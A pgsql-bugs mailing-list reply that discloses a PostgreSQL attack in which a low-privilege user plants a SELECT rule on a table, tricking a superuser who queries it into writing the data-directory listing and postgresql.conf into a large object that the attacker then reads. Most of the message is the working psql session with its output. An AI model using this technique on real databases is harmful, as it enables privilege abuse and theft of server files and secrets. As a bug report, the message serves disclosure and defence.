Re: BUG #13651: trigger security invoker attack - Mailing list pgsql-bugs
| From | 德哥 |
|---|---|
| Subject | Re: BUG #13651: trigger security invoker attack |
| Date | |
| Msg-id | 6afdf76.718e.1501cb131cf.Coremail.digoal@126.com Whole thread Raw |
| In response to | Re: BUG #13651: trigger security invoker attack ("David G. Johnston" <david.g.johnston@gmail.com>) |
| List | pgsql-bugs |
Thanks, there is also other risks in PostgreSQL.
people can use large object function & rule spoofing.
postgres=> create table v2(id int);
CREATE TABLE
postgres=> select lo_create(1);
lo_create
-----------
1
(1 row)
postgres=> create rule "_RETURN" as on select to v2 do instead select 1 as id from (select lowrite(lo_open(1,131072), con::bytea) from (select string_agg(c,' | ') as con from pg_ls_dir('.') as t(c)) t)t;;
CREATE RULE
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# select * from v2;
id
----
1
(1 row)
postgres=# \c postgres digoal
postgres=> select convert_from(loread(lo_open(1,262144),1000),'utf8');
convert_from
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
pg_xlog | pg_multixact | base | .s.PGSQL.1922.lock | recovery.done | pg_log | pg_logical | pg_subtrans | backup_label.old | pg_stat_tmp | PG_VERSION | postmaster.opts | tsearch_data | pg_stat | pg_serial |
VITESSE_LICENSE_KEY | pg_notify | postgresql.conf | pg_replslot | pg_tblspc | pg_ident.conf | server.crt | pg_dynshmem | pg_twophase | global | server.key | .s.PGSQL.1922 | .s.PGSQL.1921.lock | .s.PGSQL.1921 |
postmaster.pid | pg_hba.conf | pg_worker_list.conf | pg_clog | postgresql.auto.conf | pg_snapshots
(1 row)
postgres=> select lo_create(2);
lo_create
-----------
2
(1 row)
postgres=> drop view v2;
DROP VIEW
postgres=> create table v2(id int);
CREATE TABLE
postgres=> create rule "_RETURN" as on select to v2 do instead select 1 as id from (select lowrite(lo_open(2,131072), pg_read_binary_file('postgresql.conf'))) t;
CREATE RULE
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# select * from v2;
id
----
1
(1 row)
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> select convert_from(loread(lo_open(2,262144),100000),'utf8');
convert_from
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ----------------------------- +
# PostgreSQL configuration file +
# ----------------------------- +
# +
# This file consists of lines of the form: +
# +
# name = value +
# +
# (The "=" is optional.) Whitespace may be used. Comments are introduced with +
# "#" anywhere on a line. The complete list of parameter names and allowed +
# values can be found in the PostgreSQL documentation. +
# +
# The commented-out settings shown in this file represent the default values. +
# Re-commenting a setting is NOT sufficient to revert it to the default value; +
# you need to reload the server. +
# +
# This file is read on server startup and when the server receives a SIGHUP +
# signal. If you edit the file on a running system, you have to SIGHUP the +
# server for the changes to take effect, or use "pg_ctl reload". Some +
# parameters, which are marked below, require a server shutdown and restart to +
......
pgsql-bugs by date: